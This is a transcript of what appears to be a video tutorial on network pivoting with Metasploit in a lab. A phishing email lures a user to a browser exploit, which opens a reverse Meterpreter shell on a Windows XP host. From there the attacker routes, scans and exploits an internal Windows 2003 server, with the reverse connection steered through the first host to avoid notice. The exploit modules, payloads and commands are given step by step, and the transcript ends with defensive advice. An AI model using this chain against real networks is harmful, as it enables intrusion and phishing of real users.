In this video, we're going to talk about how to use one attack against a machine in order to then pivot to other machines in your trusted environment in order to attack the other machines there. Basically, what we're going to do is we're going to attack one machine, and then we're going to use that one machine that we've attacked and compromised, and we're going to attack everybody else on the trusted. So what that means, we're going to come along in our trusted environment. We are out here on the internet. Now we're going to compromise this Windows XP machine right here. Basically, we know of a way to be able to target one specific machine, and we're going to compromise that. Once we've done that, we're then going to use that to try to start compromising these other machines. Those other machines are going to be significantly easier to compromise simply because of the fact that this right here, that our internal network is trusted. And this has to do with the way that a lot of networks are designed. You have a trusted network, you have an untrusted network. Everything inside your trusted network is by default trusted. Everything outside of your trusted network is untrusted. So we're going to take advantage of this trust in order to further exploit our machines. So let's go ahead and kick that off. So I'm going to go over to my backtrack machine here. And what I'm going to do is, first off, I'm going to stop my Apache server. I just had Apache running on here, so I'm going to go ahead and stop that. Apache 2CTL stop. And then I'm going to go ahead and open up the Metasploit console. There we go. That looks better. Now, the target machine that I know that I want to attack, first off, has a very specific operating system and browser that I already know how to attack quite successfully. So once the Metasploit console opens up, I'm going to go ahead and prepare for that exploit. So Windows/browser, it's a browser exploit that I want. It's going to be MS09 002 _ memory corruption. If I do a show options, it tells me here's all the options that exist. Some of them are required, such as SRV host, and then some of them have default options, such as SRV port, that I want to change. So what I'm going to do is I'm going to set SRV host. These are case sensitive, by the way. Up here, server host is capitalized, so down here, server host needs to be capitalized as well. So set server host 216.6.1.100. There we go. And then set SRV port, and I want this to be port 80. Most web traffic runs over either port 80 or 443. Therefore, I want to run on port 8443. While I'm here, I'm also going to set URI path as to just slash. So just the root of the directory is where I want people attacked from. So this is my exploit right here that I'm setting up. Along with that exploit, I also want to set up a payload. So a way to be able to further attack the machine. So I'm going to set payload, and that is Windows interpreter reverse _ TCP. Now if I do a show options, so my exploit options are all set. However, I now need to do my payload options, specifically just the lhost or the local host option. So set lhost, and again, that's going to be my machine 216.6.1.1. All right, at this point, I can go ahead and run exploit. Now, if exploit by default will only exploit or will only accept one client and attempt to exploit it, if I do a -J-Z, what will happen is it will then attempt to exploit multiple machines. So if I know I'm only targeting one machine and only one machine should be coming back here, I probably just want to run exploit all by itself. If I know I'm attacking multiple machines, I probably want the -J-Z. I'm going to leave it with just plain exploit. At this point, what it's doing is it's listening on this web page and it's saying, I'm just waiting for somebody to connect. As soon as they do, I'm going to try to attack them. Great. Now all I need to do is lure somebody into this attack, and I'm good to go. So I'm going to come on out here to my mail client. I've gone ahead and I've sent an email here from a prior video to Reggie. I'm going to go ahead and just reply to all. I want to respond back to Reggie again. So Sam. And in the prior video, in the prior email, I said, hey, I'm having some SQL issues. Can you go ahead and try it out? What I'm going to do now is I'm just going to respond back to him. And I'm going to say, you know what? I think I fixed it. I think fixed the page cannot be displayed. Error. Can you try? And now this URL, if you watch the prior video, is actually a malicious URL. It is, even though it looks like it's pointing to server.xyzcompany.com, it's actually pointing to my web browser. Hold on. Let me try that again. I think I got the page cannot be displayed. Error fixed. Can you try it again? Server.xyzcompany.com. All right, let's go ahead and save this. Close that. And then browse to that file. Let's edit. I have to edit this because I did a typo in a prior video. So what I did right here was for the computer URL, I typed in the wrong IP address. It should have been 216.6.1.100 and I typed in 1.200 and that was completely wrong. So hopefully this is the correct address. Save that. New. This is going, let's see, insert web2 as text. And then this is going to R Miller, go at XYZ Company, and SQL page. And hopefully I'm, if I'm a hacker, hopefully I'm putting more effort into my attack than this. However, assuming I've got quite a bit of good rapport with Reggie, Reggie may be expecting this message. All right, so now I need to just log in as Reggie and make him click this link. So that was the prior page that he got. Now, there we go. Sam Perkins now gets the new email back from Reggie, and Reggie now gets the email from Sam saying, hey, I saw that you got that error before, try it again. Again, when I hover over the link, I'll notice that the friendly name does not match the computer name, and that should be something that the end user should be able to recognize if they've been taught to look. So I'm going to go ahead and click on this, as nobody should be doing, but I'm going to anyway. And we'll notice that we get some stuff on the screen. So obviously Sam was saying that there were some issues previously. He thinks he fixed them. I tried it again and Sam has not fixed the issue. If you've worked with IT departments in the past, you know that this is not all that uncommon. I think I fixed it. No, I didn't. But from the hacker's point of view, I now own this. If I go back into Metasploit, I can see somebody connected, specifically in Internet Explorer, and I sent them the attack. It then sent the stage, opened up a session, set a migration process up. So it moves from Internet Explorer over to notepad.exe. So it runs from something, or moves from something that's visible to the end user to something that is hidden from the end user and is now fully migrated onto them. If I run the command sessions-l, it lists out all the sessions that I'm attached to. It's currently just the one. So ID number 1, I'm going to sessions-i for interactive onto ID number 1. At this point, I'm on this machine. For instance, if I do the shell command, I can run off the C prompt and I can do an ipconfig -all. And I can see, yes, our Windows XP machine has an IP address 192.168.1.175. Awesome. Not only do I know that it's 175, I know the subnet mask, which is a Class C network, and I know the default gateway. So I know what to look for as far as other machines on the network. In fact, I've even got a DNS server right here. That's awesome. It tells me everything I need to know that quickly. So I'm going to exit out of the shell and get back into the Meterpreter. And now I want to start attacking the other machines. All right, so my backtrack machine here has successfully attacked our Windows XP Pro. This guy is now mine. I can do whatever I want to it. However, it's a desktop. A desktop doesn't necessarily have a lot of capabilities or a lot of interesting information. What I want to do now is I want to attack these other machines, and that's called pivoting. I want to pivot my attack from one onto another, and in order to do that, I kind of have to do a basic networking thing, which is called routing. I need to set up a route on my backtrack machine to say anything that goes to this internal network right here, go through our XP Pro machine. So let's go ahead and do that. And it is pretty much just that simple as what I just said. There's command run auto route. No, run auto route, and then the network -s 192.168.1.0, which I see 192.168.1 with a /24. So 192.168.1.0, anything going to the 192.168.0/255 will now go through our XP Pro machine. Awesome. So now I can start scanning the internal network to see what types of devices are there. For that, there's the ARP scanner. This is essentially Nmap that's already built into Nmap that is built into over ARP as opposed to ping, but this is going to go ahead and scan the internal network. It's already told me, hey, I found a couple of IP addresses, 1.1, 1.100, along with their associated MAC addresses. There should be, I think, 2 more. 1.200. Alright, so it gave me 3 IP addresses. The first one is the gateway. That may be of interest to me. For right now, I'm actually going to ignore that one. The 1.100 sounded pretty interesting, specifically because that is also its DNS server. I'm going to try to attack that one. First, I want to get out of this interactive sessions, back around. There we go. Because now I want to start exploiting the other machines. So first off, clear my screen, make it a little bit easier. I want to, because that's a Windows machine, or I think it's a Windows machine, I want to learn more information about it. I'm going to use an auxiliary scanner for server messaging block, or SMB. SMB_version, and set our hosts 192.168.1.100. So the remote host for the scanner is going to be that one machine that we're not quite sure of, and I'm going to run this, and very quickly it returns back, hey, this is running Windows 2003, no service pack. Here's a little bit more information. It's on a domain. Awesome. So now I know what version of operating system it is. I can now start using my exploits. I've already done some research in the past. I know that Windows Server 2003 with no service pack has a lot of exploits available to it. So I'm going to specifically use an exploit. Windows DCE RPC NS03026. Again, set our hosts 192.168.1.100. Let's show options, see what else is missing. That's it as far as the exploit is concerned. What I need to include now is a payload. So set payload, and same thing as before. I want this to be a reverse TCP connection. And now I need to, in my payload options, specify a local host. Now this is where things might get a little interesting. So I've already compromised my Windows XP Pro machine, and I have a reverse TCP connection coming back from it. So I have reverse. From a security engineer's point of view, a Windows desktop is not really that big of a concern to me. An internet connection coming from a Windows XP Pro machine or Windows machine is kind of expected, and so I'm not really going to pay a whole lot of attention to it. I'm now compromising my Windows 2003 machine, and then at that point I want to do a reverse TCP connection. Wow. So I have two options. I can have a reverse TCP connection coming directly to my backtrack machine, or I can have it go to the Windows XP Pro, which then routes to my backtrack machine. Now, this guy right here, this reverse connection that's coming straight to my machine might look a little suspicious if servers are making TCP connections out to the internet. But if they're making connections to the internal network, to the trusted network, that's not as suspicious. So I'm actually going to set the local host, instead of it being my backtrack machine, I'm going to set the payload's local host to be the XP Pro. Set lhost 192.168.1.175. Is that my IP? That's my IP. And then exploit. Now, this may or may not work. This may cause some errors on the Windows client. Let's actually check the XP machine. Because the XP machine is not normally doing this. There we go. We see that there's a Windows security alert. Now, if I was a hacker and I was doing this properly, I would have probably turned off the security alert ahead of time. But basically it's saying, hey, I see Notepad is trying to access the network. Do you want to allow this? Now, thankfully, most people are not super skilled in this, and they would say, yeah, I use Notepad. Go ahead and unblock that and just through. Once that's done, I come back to my backtrack machine and I just run exploit again, and hopefully, yep, we can see it's sending its stage. Hopefully that will go through and actually the machine. There we go. Session number 2 open. So now if I do sessions -L for list. Okay. Oh, so it logged me right in. Okay. Yeah, so it went ahead and logged me right in. Didn't even ask me to open up the set or to connect to the session. Yeah, so there we go. That was the process of pivoting from one machine to another. So once the one machine was attacked, we were able to use a less secure connection in order to use an exploit, MS03026. You may have thought, oh, well, we're inside the firewall. We don't need to patch our environment. Not that critical of a situation. However, because it was the trusted network, I was able then to exploit that lack of diligence to then further attack your company. Some things you could do in order to speed this along, to stop this from happening as far as a security person. What you could do is you could put firewalls on front of each of these machines, whether that's the Windows firewall or a dedicated piece of firewall. Even just a firewall between the desktops and all the servers would have possibly stopped this. Along with that, shutting down services that aren't necessary on all of our servers. Identifying exactly what traffic should be going between the servers and the clients, and what type of traffic should be going between these, and then only allowing that traffic to occur. Having some sort of an IDS system in front of your firewalls, in front of your servers, would also help with this. There's what's called a network IDS, network intrusion detection system, as well as a host intrusion detection system, both of which would have stopped this, hopefully. And then lastly, patch. Keep everything patched and up to date, as well as teach your employees not to click on questionable. There you go. That's how a hacker would be able to take one machine and then pivot to all the other machines in your environment. Turns out to be significantly easier than trying to brute force attack every single machine.